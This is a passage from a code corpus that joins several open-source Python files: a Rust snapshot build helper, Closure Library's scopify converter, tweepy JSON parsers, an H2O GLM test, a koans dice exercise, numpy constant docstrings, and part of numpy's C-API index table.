"winnt": ["bin/rustc.exe"],
"freebsd": ["bin/rustc"],
"dragonfly": ["bin/rustc"],
"bitrig": ["bin/rustc"],
"openbsd": ["bin/rustc"],
}
winnt_runtime_deps_32 = ["libgcc_s_dw2-1.dll", "libstdc++-6.dll"]
winnt_runtime_deps_64 = ["libgcc_s_seh-1.dll", "libstdc++-6.dll"]
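# Illustrative sketch of the snapshots.txt entries that parse_line() below
# accepts (inferred from its regular expressions, not copied from the real
# file):
#   S 2015-01-15 9ade482
#         linux-x86_64 70b126347e65810a9c6a4f41de7deba12e0d4c63
# i.e. a snapshot header line ("S <date> <rev>") followed by indented
# per-platform lines carrying a 40-character SHA1 of the snapshot tarball.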
def parse_line(n, line):
global snapshotfile
if re.match(r"\s*$", line):
return None
if re.match(r"^T\s*$", line):
return None
match = re.match(r"\s+([\w_-]+) ([a-fA-F\d]{40})\s*$", line)
if match:
return {"type": "file",
"platform": match.group(1),
"hash": match.group(2).lower()}
match = re.match(r"([ST]) (\d{4}-\d{2}-\d{2}) ([a-fA-F\d]+)\s*$", line)
if not match:
raise Exception("%s:%d:E syntax error: " % (snapshotfile, n))
return {"type": "snapshot",
"date": match.group(2),
"rev": match.group(3)}
def partial_snapshot_name(date, rev, platform):
return ("rust-stage0-%s-%s-%s.tar.bz2" %
(date, rev, platform))
def full_snapshot_name(date, rev, platform, hsh):
return ("rust-stage0-%s-%s-%s-%s.tar.bz2" %
(date, rev, platform, hsh))
def get_kernel(triple):
t = triple.split('-')
if len(t) == 2:
os_name = t[1]
else:
os_name = t[2]
if os_name == "windows":
return "winnt"
if os_name == "darwin":
return "macos"
if os_name == "freebsd":
return "freebsd"
if os_name == "dragonfly":
return "dragonfly"
if os_name == "bitrig":
return "bitrig"
if os_name == "openbsd":
return "openbsd"
return "linux"
def get_cpu(triple):
arch = triple.split('-')[0]
if arch == "i686":
return "i386"
return arch
def get_platform(triple):
return "%s-%s" % (get_kernel(triple), get_cpu(triple))
def cmd_out(cmdline):
p = subprocess.Popen(cmdline, stdout=subprocess.PIPE)
return scrub(p.communicate()[0].strip())
def local_rev_info(field):
return cmd_out(["git", "--git-dir=" + os.path.join(src_dir, ".git"),
"log", "-n", "1",
"--format=%%%s" % field, "HEAD"])
def local_rev_full_sha():
return local_rev_info("H").split()[0]
def local_rev_short_sha():
return local_rev_info("h").split()[0]
def local_rev_committer_date():
return local_rev_info("ci")
def get_url_to_file(u, f):
# no security issue, just to stop partial download leaving a stale file
tmpf = f + '.tmp'
returncode = -1
if distutils.spawn.find_executable("curl"):
returncode = subprocess.call(["curl", "-o", tmpf, u])
elif distutils.spawn.find_executable("wget"):
returncode = subprocess.call(["wget", "-O", tmpf, u])
if returncode != 0:
try:
os.unlink(tmpf)
except OSError:
pass
raise Exception("failed to fetch url")
os.rename(tmpf, f)
def snap_filename_hash_part(snap):
match = re.match(r".*([a-fA-F\d]{40}).tar.bz2$", snap)
if not match:
raise Exception("unable to find hash in filename: " + snap)
return match.group(1)
def hash_file(x):
h = sha_func()
h.update(open(x, "rb").read())
return scrub(h.hexdigest())
def get_winnt_runtime_deps(platform):
"""Returns a list of paths of Rust's system runtime dependencies"""
if platform == "winnt-x86_64":
deps = winnt_runtime_deps_64
else:
deps = winnt_runtime_deps_32
runtime_deps = []
path_dirs = os.environ["PATH"].split(os.pathsep)
for name in deps:
for dir in path_dirs:
filepath = os.path.join(dir, name)
if os.path.isfile(filepath):
runtime_deps.append(filepath)
break
else:
raise Exception("Could not find runtime dependency: %s" % name)
return runtime_deps
def make_snapshot(stage, triple):
kernel = get_kernel(triple)
platform = get_platform(triple)
rev = local_rev_short_sha()
date = local_rev_committer_date().split()[0]
file0 = partial_snapshot_name(date, rev, platform)
def in_tar_name(fn):
cs = re.split(r"[\\/]", fn)
if len(cs) >= 2:
return os.sep.join(cs[-2:])
tar = tarfile.open(file0, "w:bz2")
for name in snapshot_files[kernel]:
dir = stage
if stage == "stage1" and re.match(r"^lib/(lib)?std.*", name):
dir = "stage0"
fn_glob = os.path.join(triple, dir, name)
matches = glob.glob(fn_glob)
if not matches:
            raise Exception("No file found with name like " + fn_glob)
if len(matches) == 1:
tar.add(matches[0], "rust-stage0/" + in_tar_name(matches[0]))
else:
raise Exception("Found stale files: \n %s\n"
"Please make a clean build." % "\n ".join(matches))
if kernel == "winnt":
for path in get_winnt_runtime_deps(platform):
tar.add(path, "rust-stage0/bin/" + os.path.basename(path))
tar.add(os.path.join(os.path.dirname(__file__), "third-party"),
"rust-stage0/bin/third-party")
tar.close()
h = hash_file(file0)
file1 = full_snapshot_name(date, rev, platform, h)
shutil.move(file0, file1)
return file1
def curr_snapshot_rev():
i = 0
found_snap = False
date = None
rev = None
f = open(snapshotfile)
for line in f.readlines():
i += 1
parsed = parse_line(i, line)
if not parsed:
continue
if parsed["type"] == "snapshot":
date = parsed["date"]
rev = parsed["rev"]
found_snap = True
break
if not found_snap:
raise Exception("no snapshot entries in file")
return (date, rev)
def determine_curr_snapshot(triple):
i = 0
platform = get_platform(triple)
found_file = False
found_snap = False
hsh = None
date = None
rev = None
f = open(snapshotfile)
for line in f.readlines():
i += 1
parsed = parse_line(i, line)
if not parsed:
continue
if found_snap and parsed["type"] == "file":
if parsed["platform"] == platform:
hsh = parsed["hash"]
found_file = True
break
elif parsed["type"] == "snapshot":
date = parsed["date"]
rev = parsed["rev"]
found_snap = True
if not found_snap:
raise Exception("no snapshot entries in file")
if not found_file:
raise Exception("no snapshot file found for platform %s, rev %s" %
(platform, rev))
return full_snapshot_name(date, rev, platform, hsh)
|
apache-2.0
|
endlessm/chromium-browser
|
third_party/google_input_tools/third_party/closure_library/closure/bin/scopify.py
|
329
|
6785
|
#!/usr/bin/python
#
# Copyright 2010 The Closure Library Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Automatically converts codebases over to goog.scope.
Usage:
cd path/to/my/dir;
../../../../javascript/closure/bin/scopify.py
Scans every file in this directory, recursively. Looks for existing
goog.scope calls, and goog.require'd symbols. If it makes sense to
generate a goog.scope call for the file, then we will do so, and
try to auto-generate some aliases based on the goog.require'd symbols.
Known Issues:
When a file is goog.scope'd, the file contents will be indented +2.
This may put some lines over 80 chars. These will need to be fixed manually.
We will only try to create aliases for capitalized names. We do not check
to see if those names will conflict with any existing locals.
This creates merge conflicts for every line of every outstanding change.
If you intend to run this on your codebase, make sure your team members
know. Better yet, send them this script so that they can scopify their
outstanding changes and "accept theirs".
When an alias is "captured", it can no longer be stubbed out for testing.
Run your tests.
"""
__author__ = '[email protected] (Nick Santos)'
import os.path
import re
import sys
REQUIRES_RE = re.compile(r"goog.require\('([^']*)'\)")
# Edit this manually if you want something to "always" be aliased.
# TODO(nicksantos): Add a flag for this.
DEFAULT_ALIASES = {}
def Transform(lines):
"""Converts the contents of a file into javascript that uses goog.scope.
Arguments:
lines: A list of strings, corresponding to each line of the file.
Returns:
A new list of strings, or None if the file was not modified.
"""
requires = []
# Do an initial scan to be sure that this file can be processed.
for line in lines:
# Skip this file if it has already been scopified.
if line.find('goog.scope') != -1:
return None
# If there are any global vars or functions, then we also have
# to skip the whole file. We might be able to deal with this
# more elegantly.
if line.find('var ') == 0 or line.find('function ') == 0:
return None
for match in REQUIRES_RE.finditer(line):
requires.append(match.group(1))
if len(requires) == 0:
return None
# Backwards-sort the requires, so that when one is a substring of another,
# we match the longer one first.
for val in DEFAULT_ALIASES.values():
if requires.count(val) == 0:
requires.append(val)
requires.sort()
requires.reverse()
# Generate a map of requires to their aliases
aliases_to_globals = DEFAULT_ALIASES.copy()
for req in requires:
index = req.rfind('.')
if index == -1:
alias = req
else:
alias = req[(index + 1):]
# Don't scopify lowercase namespaces, because they may conflict with
# local variables.
if alias[0].isupper():
aliases_to_globals[alias] = req
aliases_to_matchers = {}
globals_to_aliases = {}
for alias, symbol in aliases_to_globals.items():
globals_to_aliases[symbol] = alias
aliases_to_matchers[alias] = re.compile('\\b%s\\b' % symbol)
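  # Illustrative example (not from the original sources): for a file that
  # goog.require's 'goog.dom.DomHelper', the maps built above contain
  #     globals_to_aliases['goog.dom.DomHelper'] == 'DomHelper'
  # so every occurrence of the full symbol in the body is later rewritten to
  # the alias, and "var DomHelper = goog.dom.DomHelper;" is inserted at the
  # top of the generated goog.scope block.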
# Insert a goog.scope that aliases all required symbols.
result = []
START = 0
SEEN_REQUIRES = 1
IN_SCOPE = 2
mode = START
aliases_used = set()
insertion_index = None
num_blank_lines = 0
for line in lines:
if mode == START:
result.append(line)
if re.search(REQUIRES_RE, line):
mode = SEEN_REQUIRES
elif mode == SEEN_REQUIRES:
if (line and
not re.search(REQUIRES_RE, line) and
not line.isspace()):
# There should be two blank lines before goog.scope
result += ['\n'] * 2
result.append('goog.scope(function() {\n')
insertion_index = len(result)
result += ['\n'] * num_blank_lines
mode = IN_SCOPE
elif line.isspace():
# Keep track of the number of blank lines before each block of code so
# that we can move them after the goog.scope line if necessary.
num_blank_lines += 1
else:
# Print the blank lines we saw before this code block
result += ['\n'] * num_blank_lines
num_blank_lines = 0
result.append(line)
if mode == IN_SCOPE:
for symbol in requires:
if not symbol in globals_to_aliases:
continue
alias = globals_to_aliases[symbol]
matcher = aliases_to_matchers[alias]
for match in matcher.finditer(line):
# Check to make sure we're not in a string.
# We do this by being as conservative as possible:
# if there are any quote or double quote characters
# before the symbol on this line, then bail out.
before_symbol = line[:match.start(0)]
if before_symbol.count('"') > 0 or before_symbol.count("'") > 0:
continue
line = line.replace(match.group(0), alias)
aliases_used.add(alias)
if line.isspace():
# Truncate all-whitespace lines
result.append('\n')
else:
result.append(line)
if len(aliases_used):
aliases_used = [alias for alias in aliases_used]
aliases_used.sort()
aliases_used.reverse()
for alias in aliases_used:
symbol = aliases_to_globals[alias]
result.insert(insertion_index,
'var %s = %s;\n' % (alias, symbol))
result.append('}); // goog.scope\n')
return result
else:
return None
def TransformFileAt(path):
"""Converts a file into javascript that uses goog.scope.
Arguments:
path: A path to a file.
"""
f = open(path)
lines = Transform(f.readlines())
if lines:
f = open(path, 'w')
for l in lines:
f.write(l)
f.close()
if __name__ == '__main__':
args = sys.argv[1:]
if not len(args):
args = '.'
for file_name in args:
if os.path.isdir(file_name):
for root, dirs, files in os.walk(file_name):
for name in files:
if name.endswith('.js') and \
not os.path.islink(os.path.join(root, name)):
TransformFileAt(os.path.join(root, name))
else:
if file_name.endswith('.js') and \
not os.path.islink(file_name):
TransformFileAt(file_name)
|
bsd-3-clause
|
stone5495/NewsBlur
|
vendor/tweepy/parsers.py
|
74
|
2622
|
# Tweepy
# Copyright 2009-2010 Joshua Roesslein
# See LICENSE for details.
from tweepy.models import ModelFactory
from tweepy.utils import import_simplejson
from tweepy.error import TweepError
class Parser(object):
def parse(self, method, payload):
"""
Parse the response payload and return the result.
Returns a tuple that contains the result data and the cursors
(or None if not present).
"""
raise NotImplementedError
def parse_error(self, payload):
"""
Parse the error message from payload.
If unable to parse the message, throw an exception
and default error message will be used.
"""
raise NotImplementedError
class RawParser(Parser):
def __init__(self):
pass
def parse(self, method, payload):
return payload
def parse_error(self, payload):
return payload
class JSONParser(Parser):
payload_format = 'json'
def __init__(self):
self.json_lib = import_simplejson()
def parse(self, method, payload):
try:
json = self.json_lib.loads(payload)
except Exception, e:
raise TweepError('Failed to parse JSON payload: %s' % e)
needsCursors = method.parameters.has_key('cursor')
if needsCursors and isinstance(json, dict) and 'previous_cursor' in json and 'next_cursor' in json:
cursors = json['previous_cursor'], json['next_cursor']
return json, cursors
else:
return json
def parse_error(self, payload):
error = self.json_lib.loads(payload)
if error.has_key('error'):
return error['error']
else:
return error['errors']
class ModelParser(JSONParser):
def __init__(self, model_factory=None):
JSONParser.__init__(self)
self.model_factory = model_factory or ModelFactory
def parse(self, method, payload):
try:
if method.payload_type is None: return
model = getattr(self.model_factory, method.payload_type)
except AttributeError:
raise TweepError('No model for this payload type: %s' % method.payload_type)
json = JSONParser.parse(self, method, payload)
if isinstance(json, tuple):
json, cursors = json
else:
cursors = None
if method.payload_list:
result = model.parse_list(method.api, json)
else:
result = model.parse(method.api, json)
if cursors:
return result, cursors
else:
return result
|
mit
|
h2oai/h2o
|
py/testdir_single_jvm/notest_GLM2_weight_nan_fail.py
|
9
|
1512
|
import unittest, random, sys, time
sys.path.extend(['.','..','../..','py'])
import h2o, h2o_cmd, h2o_glm, h2o_import as h2i
class Basic(unittest.TestCase):
def tearDown(self):
h2o.check_sandbox_for_errors()
@classmethod
def setUpClass(cls):
global SEED
SEED = h2o.setup_random_seed()
h2o.init()
@classmethod
def tearDownClass(cls):
h2o.tear_down_cloud()
def test_NOPASS_GLM2_weight_nan_fail(self):
csvPathname = 'covtype/covtype.20k.data'
hex_key = 'covtype.20k.hex'
parseResult = h2i.import_parse(bucket='smalldata', path=csvPathname, hex_key=hex_key, schema='put')
kwargs = {
'destination_key': 'GLM_model_python_0_default_0',
'family': 'tweedie',
'tweedie_variance_power': 1.9999999,
'max_iter': 10,
'alpha': 0,
'lambda': 0,
'response': 54,
}
for trial in range(3):
# params is mutable. This is default.
start = time.time()
glm = h2o_cmd.runGLM(timeoutSecs=70, parseResult=parseResult, **kwargs)
h2o.check_sandbox_for_errors()
# pass the kwargs with all the params, so we know what we asked for!
h2o_glm.simpleCheckGLM(self, glm, None, **kwargs)
print "glm end on ", csvPathname, 'took', time.time() - start, 'seconds'
print "Trial #", trial, "completed\n"
if __name__ == '__main__':
h2o.unit_main()
|
apache-2.0
|
GGXH/python_koans
|
python_koans/python2/koans/about_dice_project.py
|
94
|
1895
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from runner.koan import *
import random
class DiceSet(object):
def __init__(self):
self._values = None
@property
def values(self):
return self._values
def roll(self, n):
# Needs implementing!
# Tip: random.randint(min, max) can be used to generate random numbers
pass
class AboutDiceProject(Koan):
def test_can_create_a_dice_set(self):
dice = DiceSet()
self.assertTrue(dice)
def test_rolling_the_dice_returns_a_set_of_integers_between_1_and_6(self):
dice = DiceSet()
dice.roll(5)
self.assertTrue(isinstance(dice.values, list), "should be a list")
self.assertEqual(5, len(dice.values))
for value in dice.values:
self.assertTrue(
value >= 1 and value <= 6,
"value " + str(value) + " must be between 1 and 6")
def test_dice_values_do_not_change_unless_explicitly_rolled(self):
dice = DiceSet()
dice.roll(5)
first_time = dice.values
second_time = dice.values
self.assertEqual(first_time, second_time)
def test_dice_values_should_change_between_rolls(self):
dice = DiceSet()
dice.roll(5)
first_time = dice.values
dice.roll(5)
second_time = dice.values
self.assertNotEqual(first_time, second_time, \
"Two rolls should not be equal")
# THINK ABOUT IT:
#
# If the rolls are random, then it is possible (although not
# likely) that two consecutive rolls are equal. What would be a
# better way to test this?
def test_you_can_roll_different_numbers_of_dice(self):
dice = DiceSet()
dice.roll(3)
self.assertEqual(3, len(dice.values))
dice.roll(1)
self.assertEqual(1, len(dice.values))
|
mit
|
pelson/numpy
|
numpy/doc/constants.py
|
94
|
8888
|
"""
=========
Constants
=========
Numpy includes several constants:
%(constant_list)s
"""
#
# Note: the docstring is autogenerated.
#
import textwrap, re
# Maintain same format as in numpy.add_newdocs
constants = []
def add_newdoc(module, name, doc):
constants.append((name, doc))
add_newdoc('numpy', 'Inf',
"""
IEEE 754 floating point representation of (positive) infinity.
Use `inf` because `Inf`, `Infinity`, `PINF` and `infty` are aliases for
`inf`. For more details, see `inf`.
See Also
--------
inf
""")
add_newdoc('numpy', 'Infinity',
"""
IEEE 754 floating point representation of (positive) infinity.
Use `inf` because `Inf`, `Infinity`, `PINF` and `infty` are aliases for
`inf`. For more details, see `inf`.
See Also
--------
inf
""")
add_newdoc('numpy', 'NAN',
"""
IEEE 754 floating point representation of Not a Number (NaN).
`NaN` and `NAN` are equivalent definitions of `nan`. Please use
`nan` instead of `NAN`.
See Also
--------
nan
""")
add_newdoc('numpy', 'NINF',
"""
IEEE 754 floating point representation of negative infinity.
Returns
-------
y : float
A floating point representation of negative infinity.
See Also
--------
isinf : Shows which elements are positive or negative infinity
isposinf : Shows which elements are positive infinity
isneginf : Shows which elements are negative infinity
isnan : Shows which elements are Not a Number
isfinite : Shows which elements are finite (not one of Not a Number,
positive infinity and negative infinity)
Notes
-----
Numpy uses the IEEE Standard for Binary Floating-Point for Arithmetic
(IEEE 754). This means that Not a Number is not equivalent to infinity.
Also that positive infinity is not equivalent to negative infinity. But
infinity is equivalent to positive infinity.
Examples
--------
>>> np.NINF
-inf
>>> np.log(0)
-inf
""")
add_newdoc('numpy', 'NZERO',
"""
IEEE 754 floating point representation of negative zero.
Returns
-------
y : float
A floating point representation of negative zero.
See Also
--------
PZERO : Defines positive zero.
isinf : Shows which elements are positive or negative infinity.
isposinf : Shows which elements are positive infinity.
isneginf : Shows which elements are negative infinity.
isnan : Shows which elements are Not a Number.
isfinite : Shows which elements are finite - not one of
Not a Number, positive infinity and negative infinity.
Notes
-----
Numpy uses the IEEE Standard for Binary Floating-Point for Arithmetic
(IEEE 754). Negative zero is considered to be a finite number.
Examples
--------
>>> np.NZERO
-0.0
>>> np.PZERO
0.0
>>> np.isfinite([np.NZERO])
array([ True], dtype=bool)
>>> np.isnan([np.NZERO])
array([False], dtype=bool)
>>> np.isinf([np.NZERO])
array([False], dtype=bool)
""")
add_newdoc('numpy', 'NaN',
"""
IEEE 754 floating point representation of Not a Number (NaN).
`NaN` and `NAN` are equivalent definitions of `nan`. Please use
`nan` instead of `NaN`.
See Also
--------
nan
""")
add_newdoc('numpy', 'PINF',
"""
IEEE 754 floating point representation of (positive) infinity.
Use `inf` because `Inf`, `Infinity`, `PINF` and `infty` are aliases for
`inf`. For more details, see `inf`.
See Also
--------
inf
""")
add_newdoc('numpy', 'PZERO',
"""
IEEE 754 floating point representation of positive zero.
Returns
-------
y : float
A floating point representation of positive zero.
See Also
--------
NZERO : Defines negative zero.
isinf : Shows which elements are positive or negative infinity.
isposinf : Shows which elements are positive infinity.
isneginf : Shows which elements are negative infinity.
isnan : Shows which elements are Not a Number.
isfinite : Shows which elements are finite - not one of
Not a Number, positive infinity and negative infinity.
Notes
-----
Numpy uses the IEEE Standard for Binary Floating-Point for Arithmetic
(IEEE 754). Positive zero is considered to be a finite number.
Examples
--------
>>> np.PZERO
0.0
>>> np.NZERO
-0.0
>>> np.isfinite([np.PZERO])
array([ True], dtype=bool)
>>> np.isnan([np.PZERO])
array([False], dtype=bool)
>>> np.isinf([np.PZERO])
array([False], dtype=bool)
""")
add_newdoc('numpy', 'e',
"""
Euler's constant, base of natural logarithms, Napier's constant.
``e = 2.71828182845904523536028747135266249775724709369995...``
See Also
--------
exp : Exponential function
log : Natural logarithm
References
----------
.. [1] http://en.wikipedia.org/wiki/Napier_constant
""")
add_newdoc('numpy', 'inf',
"""
IEEE 754 floating point representation of (positive) infinity.
Returns
-------
y : float
A floating point representation of positive infinity.
See Also
--------
isinf : Shows which elements are positive or negative infinity
isposinf : Shows which elements are positive infinity
isneginf : Shows which elements are negative infinity
isnan : Shows which elements are Not a Number
isfinite : Shows which elements are finite (not one of Not a Number,
positive infinity and negative infinity)
Notes
-----
Numpy uses the IEEE Standard for Binary Floating-Point for Arithmetic
(IEEE 754). This means that Not a Number is not equivalent to infinity.
Also that positive infinity is not equivalent to negative infinity. But
infinity is equivalent to positive infinity.
`Inf`, `Infinity`, `PINF` and `infty` are aliases for `inf`.
Examples
--------
>>> np.inf
inf
>>> np.array([1]) / 0.
array([ Inf])
""")
add_newdoc('numpy', 'infty',
"""
IEEE 754 floating point representation of (positive) infinity.
Use `inf` because `Inf`, `Infinity`, `PINF` and `infty` are aliases for
`inf`. For more details, see `inf`.
See Also
--------
inf
""")
add_newdoc('numpy', 'nan',
"""
IEEE 754 floating point representation of Not a Number (NaN).
Returns
-------
y : A floating point representation of Not a Number.
See Also
--------
isnan : Shows which elements are Not a Number.
isfinite : Shows which elements are finite (not one of
Not a Number, positive infinity and negative infinity)
Notes
-----
Numpy uses the IEEE Standard for Binary Floating-Point for Arithmetic
(IEEE 754). This means that Not a Number is not equivalent to infinity.
`NaN` and `NAN` are aliases of `nan`.
Examples
--------
>>> np.nan
nan
>>> np.log(-1)
nan
>>> np.log([-1, 1, 2])
array([ NaN, 0. , 0.69314718])
""")
add_newdoc('numpy', 'newaxis',
"""
A convenient alias for None, useful for indexing arrays.
See Also
--------
`numpy.doc.indexing`
Examples
--------
>>> newaxis is None
True
>>> x = np.arange(3)
>>> x
array([0, 1, 2])
>>> x[:, newaxis]
array([[0],
[1],
[2]])
>>> x[:, newaxis, newaxis]
array([[[0]],
[[1]],
[[2]]])
>>> x[:, newaxis] * x
array([[0, 0, 0],
[0, 1, 2],
[0, 2, 4]])
Outer product, same as ``outer(x, y)``:
>>> y = np.arange(3, 6)
>>> x[:, newaxis] * y
array([[ 0, 0, 0],
[ 3, 4, 5],
[ 6, 8, 10]])
``x[newaxis, :]`` is equivalent to ``x[newaxis]`` and ``x[None]``:
>>> x[newaxis, :].shape
(1, 3)
>>> x[newaxis].shape
(1, 3)
>>> x[None].shape
(1, 3)
>>> x[:, newaxis].shape
(3, 1)
""")
if __doc__:
constants_str = []
constants.sort()
for name, doc in constants:
s = textwrap.dedent(doc).replace("\n", "\n ")
# Replace sections by rubrics
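        # For example (illustrative), the two consecutive docstring lines
        #     See Also
        #     --------
        # are collapsed into ".. rubric:: See Also" followed by an empty
        # line, so numpydoc-style section underlines render as rubrics.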
lines = s.split("\n")
new_lines = []
for line in lines:
m = re.match(r'^(\s+)[-=]+\s*$', line)
if m and new_lines:
prev = textwrap.dedent(new_lines.pop())
new_lines.append('%s.. rubric:: %s' % (m.group(1), prev))
new_lines.append('')
else:
new_lines.append(line)
s = "\n".join(new_lines)
# Done.
constants_str.append(""".. const:: %s\n %s""" % (name, s))
constants_str = "\n".join(constants_str)
__doc__ = __doc__ % dict(constant_list=constants_str)
del constants_str, name, doc
del line, lines, new_lines, m, s, prev
del constants, add_newdoc
|
bsd-3-clause
|
numpy/numpy
|
numpy/core/code_generators/numpy_api.py
|
11
|
20211
|
"""Here we define the exported functions, types, etc... which need to be
exported through a global C pointer.
Each dictionary contains name -> index pair.
Whenever you change one index, you break the ABI (and the ABI version number
should be incremented). Whenever you add an item to one of the dict, the API
needs to be updated in both setup_common.py and by adding an appropriate
entry to cversion.txt (generate the hash via "python cversions.py").
When adding a function, make sure to use the next integer not used as an index
(in case you use an existing index or jump, the build will stop and raise an
exception, so it should hopefully not get unnoticed).
"""
from code_generators.genapi import StealRef, NonNull
# index, type
multiarray_global_vars = {
'NPY_NUMUSERTYPES': (7, 'int'),
'NPY_DEFAULT_ASSIGN_CASTING': (292, 'NPY_CASTING'),
}
multiarray_scalar_bool_values = {
'_PyArrayScalar_BoolValues': (9,)
}
# index, annotations
# please mark functions that have been checked to not need any annotations
multiarray_types_api = {
'PyBigArray_Type': (1,),
'PyArray_Type': (2,),
# Internally, PyArrayDescr_Type is a PyArray_DTypeMeta,
# the following also defines PyArrayDescr_TypeFull (Full appended)
'PyArrayDescr_Type': (3, "PyArray_DTypeMeta"),
'PyArrayFlags_Type': (4,),
'PyArrayIter_Type': (5,),
'PyArrayMultiIter_Type': (6,),
'PyBoolArrType_Type': (8,),
'PyGenericArrType_Type': (10,),
'PyNumberArrType_Type': (11,),
'PyIntegerArrType_Type': (12,),
'PySignedIntegerArrType_Type': (13,),
'PyUnsignedIntegerArrType_Type': (14,),
'PyInexactArrType_Type': (15,),
'PyFloatingArrType_Type': (16,),
'PyComplexFloatingArrType_Type': (17,),
'PyFlexibleArrType_Type': (18,),
'PyCharacterArrType_Type': (19,),
'PyByteArrType_Type': (20,),
'PyShortArrType_Type': (21,),
'PyIntArrType_Type': (22,),
'PyLongArrType_Type': (23,),
'PyLongLongArrType_Type': (24,),
'PyUByteArrType_Type': (25,),
'PyUShortArrType_Type': (26,),
'PyUIntArrType_Type': (27,),
'PyULongArrType_Type': (28,),
'PyULongLongArrType_Type': (29,),
'PyFloatArrType_Type': (30,),
'PyDoubleArrType_Type': (31,),
'PyLongDoubleArrType_Type': (32,),
'PyCFloatArrType_Type': (33,),
'PyCDoubleArrType_Type': (34,),
'PyCLongDoubleArrType_Type': (35,),
'PyObjectArrType_Type': (36,),
'PyStringArrType_Type': (37,),
'PyUnicodeArrType_Type': (38,),
'PyVoidArrType_Type': (39,),
# End 1.5 API
'PyTimeIntegerArrType_Type': (214,),
'PyDatetimeArrType_Type': (215,),
'PyTimedeltaArrType_Type': (216,),
'PyHalfArrType_Type': (217,),
'NpyIter_Type': (218,),
# End 1.6 API
}
#define NPY_NUMUSERTYPES (*(int *)PyArray_API[6])
#define PyBoolArrType_Type (*(PyTypeObject *)PyArray_API[7])
#define _PyArrayScalar_BoolValues ((PyBoolScalarObject *)PyArray_API[8])
multiarray_funcs_api = {
'PyArray_GetNDArrayCVersion': (0,),
'PyArray_SetNumericOps': (40,),
'PyArray_GetNumericOps': (41,),
'PyArray_INCREF': (42,),
'PyArray_XDECREF': (43,),
'PyArray_SetStringFunction': (44,),
'PyArray_DescrFromType': (45,),
'PyArray_TypeObjectFromType': (46,),
'PyArray_Zero': (47,),
'PyArray_One': (48,),
'PyArray_CastToType': (49, StealRef(2), NonNull(2)),
'PyArray_CastTo': (50,),
'PyArray_CastAnyTo': (51,),
'PyArray_CanCastSafely': (52,),
'PyArray_CanCastTo': (53,),
'PyArray_ObjectType': (54,),
'PyArray_DescrFromObject': (55,),
'PyArray_ConvertToCommonType': (56,),
'PyArray_DescrFromScalar': (57,),
'PyArray_DescrFromTypeObject': (58,),
'PyArray_Size': (59,),
'PyArray_Scalar': (60,),
'PyArray_FromScalar': (61, StealRef(2)),
'PyArray_ScalarAsCtype': (62,),
'PyArray_CastScalarToCtype': (63,),
'PyArray_CastScalarDirect': (64,),
'PyArray_ScalarFromObject': (65,),
'PyArray_GetCastFunc': (66,),
'PyArray_FromDims': (67,),
'PyArray_FromDimsAndDataAndDescr': (68, StealRef(3)),
'PyArray_FromAny': (69, StealRef(2)),
'PyArray_EnsureArray': (70, StealRef(1)),
'PyArray_EnsureAnyArray': (71, StealRef(1)),
'PyArray_FromFile': (72,),
'PyArray_FromString': (73,),
'PyArray_FromBuffer': (74,),
'PyArray_FromIter': (75, StealRef(2)),
'PyArray_Return': (76, StealRef(1)),
'PyArray_GetField': (77, StealRef(2), NonNull(2)),
'PyArray_SetField': (78, StealRef(2), NonNull(2)),
'PyArray_Byteswap': (79,),
'PyArray_Resize': (80,),
'PyArray_MoveInto': (81,),
'PyArray_CopyInto': (82,),
'PyArray_CopyAnyInto': (83,),
'PyArray_CopyObject': (84,),
'PyArray_NewCopy': (85, NonNull(1)),
'PyArray_ToList': (86,),
'PyArray_ToString': (87,),
'PyArray_ToFile': (88,),
'PyArray_Dump': (89,),
'PyArray_Dumps': (90,),
'PyArray_ValidType': (91,),
'PyArray_UpdateFlags': (92,),
'PyArray_New': (93, NonNull(1)),
'PyArray_NewFromDescr': (94, StealRef(2), NonNull([1, 2])),
'PyArray_DescrNew': (95,),
'PyArray_DescrNewFromType': (96,),
'PyArray_GetPriority': (97,),
'PyArray_IterNew': (98,),
'PyArray_MultiIterNew': (99,),
'PyArray_PyIntAsInt': (100,),
'PyArray_PyIntAsIntp': (101,),
'PyArray_Broadcast': (102,),
'PyArray_FillObjectArray': (103,),
'PyArray_FillWithScalar': (104,),
'PyArray_CheckStrides': (105,),
'PyArray_DescrNewByteorder': (106,),
'PyArray_IterAllButAxis': (107,),
'PyArray_CheckFromAny': (108, StealRef(2)),
'PyArray_FromArray': (109, StealRef(2)),
'PyArray_FromInterface': (110,),
'PyArray_FromStructInterface': (111,),
'PyArray_FromArrayAttr': (112,),
'PyArray_ScalarKind': (113,),
'PyArray_CanCoerceScalar': (114,),
'PyArray_NewFlagsObject': (115,),
'PyArray_CanCastScalar': (116,),
'PyArray_CompareUCS4': (117,),
'PyArray_RemoveSmallest': (118,),
'PyArray_ElementStrides': (119,),
'PyArray_Item_INCREF': (120,),
'PyArray_Item_XDECREF': (121,),
'PyArray_FieldNames': (122,),
'PyArray_Transpose': (123,),
'PyArray_TakeFrom': (124,),
'PyArray_PutTo': (125,),
'PyArray_PutMask': (126,),
'PyArray_Repeat': (127,),
'PyArray_Choose': (128,),
'PyArray_Sort': (129,),
'PyArray_ArgSort': (130,),
'PyArray_SearchSorted': (131,),
'PyArray_ArgMax': (132,),
'PyArray_ArgMin': (133,),
'PyArray_Reshape': (134,),
'PyArray_Newshape': (135,),
'PyArray_Squeeze': (136,),
'PyArray_View': (137, StealRef(2)),
'PyArray_SwapAxes': (138,),
'PyArray_Max': (139,),
'PyArray_Min': (140,),
'PyArray_Ptp': (141,),
'PyArray_Mean': (142,),
'PyArray_Trace': (143,),
'PyArray_Diagonal': (144,),
'PyArray_Clip': (145,),
'PyArray_Conjugate': (146,),
'PyArray_Nonzero': (147,),
'PyArray_Std': (148,),
'PyArray_Sum': (149,),
'PyArray_CumSum': (150,),
'PyArray_Prod': (151,),
'PyArray_CumProd': (152,),
'PyArray_All': (153,),
'PyArray_Any': (154,),
'PyArray_Compress': (155,),
'PyArray_Flatten': (156,),
'PyArray_Ravel': (157,),
'PyArray_MultiplyList': (158,),
'PyArray_MultiplyIntList': (159,),
'PyArray_GetPtr': (160,),
'PyArray_CompareLists': (161,),
'PyArray_AsCArray': (162, StealRef(5)),
'PyArray_As1D': (163,),
'PyArray_As2D': (164,),
